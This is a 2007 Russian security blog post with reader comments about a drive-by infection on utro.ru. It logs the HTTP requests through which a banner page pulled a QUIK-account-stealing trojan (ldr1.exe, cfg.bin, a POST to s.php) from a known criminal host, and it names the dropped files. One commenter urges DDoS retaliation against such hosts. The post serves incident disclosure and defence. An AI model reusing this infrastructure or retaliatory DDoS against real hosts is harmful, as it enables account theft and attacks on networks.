Страницы

среда, 25 июля 2007 г.

utro.ru заражает посетителей

Cегодня около 16:00 на utro.ru семерка IE предложила установить Microsoft Data Access Object.

При подробном рассмотрении видим запросы в известный криминальный диапазон RBN

GET /e1/index.php HTTP/1.1\r\n
Referer: http://utro.ru/includes5/banners/advert_part.html/r/n
Host: 81.95.149.66\r\n

а дальше загрузка бота

GET /e1/file.php HTTP/1.1\r\n
GET /ldr1.exe HTTP/1.1\r\n
GET /cfg.bin HTTP/1.0\r\n
POST /s.php?1=april_002fdf3f&i= HTTP/1.0\r\n

В корне с: остался файл 3.tmp. Детектируется большинством антивирусов как

Trojan-Spy.Win32.Bancos.aam

В windows/system32 поселился ntos.exe. Детектится также.

По уточненной информации из Лаборатории Касперского троян ориентирован на кражу аккаунтов системы QUIK.

QUIK — это программный комплекс для организации доступа к биржевым торговым системам в режиме on-line. Совершение сделок с ценными бумагами через интернет называется интернет-трейдингом. Состоит QUIK из серверной части и рабочих мест (терминалов) клиента, взаимодействующих между собой через интернет.


utro.ru уведомили

RBN извинилась и троян прибила вместе с сервером
на

10 комментариев:

  1. Nortel25 июля 2007 г. в 22:44

    Урс, это не gpcode
    все веселей...

    -
    QUIK — это программный комплекс для организации доступа к биржевым торговым системам в режиме on-line. Совершение сделок с ценными бумагами через интернет называется интернет-трейдингом. Состоит QUIK из серверной части и рабочих мест (терминалов) клиента, взаимодействующих между собой через интернет.

    их файлы
    secring.txk
    pubring.txk
    qrypto.cfg

    это не для шифрования, они просто пиздили аккаунты этой системы

    ОтветитьУдалить
  2. Nortel25 июля 2007 г. в 22:52

    в аську выйди
    я всю ночь на посту

    ОтветитьУдалить
  3. Nortel26 июля 2007 г. в 10:37

    поправь текст тут и на секлабе
    вместо
    "По информации из Лаборатории Касперского троян шифрует пользовательские данные на компьютере и предлагает купить расшифровщик. В случае отказа грозится расшарить приватные данные пользователя.

    http://www.viruslist.com/ru/viruses/encyclopedia?virusid=164339"

    надо написать что трой ориентирован на кражу аккаунтов системы QUIK.

    QUIK — это программный комплекс для организации доступа к биржевым торговым системам в режиме on-line. Совершение сделок с ценными бумагами через интернет называется интернет-трейдингом. Состоит QUIK из серверной части и рабочих мест (терминалов) клиента, взаимодействующих между собой через интернет.

    ОтветитьУдалить
  4. Dark.iNiTro26 июля 2007 г. в 11:22

    врятли этот хост был удален. Скорее всего это абузоустойчивый хостинг, прикрыли фаером или сменили апишник.
    Таких хостов досить надо в ответ!

    ОтветитьУдалить
  5. Unknown26 июля 2007 г. в 13:29

    Ну не резолвится на этом адресе и ладно... А ДДос это зло, не наш метод.

    ОтветитьУдалить
  6. Dark.iNiTro26 июля 2007 г. в 13:41

    не наш, но надо. Других методов нет. Против лома нет приема.
    Хост они точно не вырубили. Смотрите сами.

    All scans completed, exiting
    iNiTro:@ ~ # ping 81.95.149.66
    PING 81.95.149.66 (81.95.149.66) 56(84) bytes of data.
    From 81.95.156.58 icmp_seq=1 Destination Net Unreachable
    From 81.95.156.58 icmp_seq=2 Destination Net Unreachable

    --- 81.95.149.66 ping statistics ---
    2 packets transmitted, 0 received, +2 errors, 100% packet loss, time 999ms

    iNiTro:@ ~ # traceroute 81.95.149.66
    traceroute to 81.95.149.66 (81.95.149.66), 30 hops max, 40 byte packets
    3 DPT-Novgor-SRP1-1.ip.peterstar.net (217.195.91.150) 1.313 ms 1.233 ms 1.169 ms
    4 J10-1-325.ge-0-3-0-7.ip.peterstar.net (82.140.89.190) 1.770 ms 1.781 ms 1.622 ms
    5 J7-1-325.ge-0-3-0-50.peterstar.net (84.204.188.1) 2.644 ms 4.497 ms 2.070 ms
    6 spb-dsr2-ae0-7.rt-comm.ru (195.161.4.33) 2.185 ms 2.453 ms 2.516 ms
    7 lnd-bgw1-po1-0-0-0.rt-comm.ru (217.106.7.46) 53.354 ms 49.308 ms 49.634 ms
    8 195.66.226.167 (195.66.226.167) 50.457 ms 48.197 ms 67.128 ms
    9 rbn.fe3-29.br02.ldn01.pccwbtn.net (63.218.52.114) 54.032 ms 55.839 ms 53.646 ms
    10 gbit-eth-34-uk.sbttel.com (81.95.156.34) 54.492 ms 56.463 ms 59.865 ms
    11 oc-3-sbttel.rbnnetwork.com (81.95.156.58) 55.106 ms !N 50.628 ms !N 55.352 ms !N
    iNiTro:@ ~ #

    просто их gateway настроен что бы ответь host unreacheable вот и все.

    ОтветитьУдалить
  7. Nick26 июля 2007 г. в 13:49

    Судя по трейсам хост недоступен из России

    ОтветитьУдалить
  8. Unknown26 июля 2007 г. в 13:51

    Спасибо Нитро, мы поправили тему. Абьюзники они и есть обьюзники.

    ОтветитьУдалить
  9. Dark.iNiTro26 июля 2007 г. в 13:54

    дейстствительно.
    Вообщем ребята живет весело на панамах. Жарко наверно там =)

    ОтветитьУдалить
  10. Unknown26 июля 2007 г. в 13:58

    Ребята живут в Питере и там дождливо =)

    ОтветитьУдалить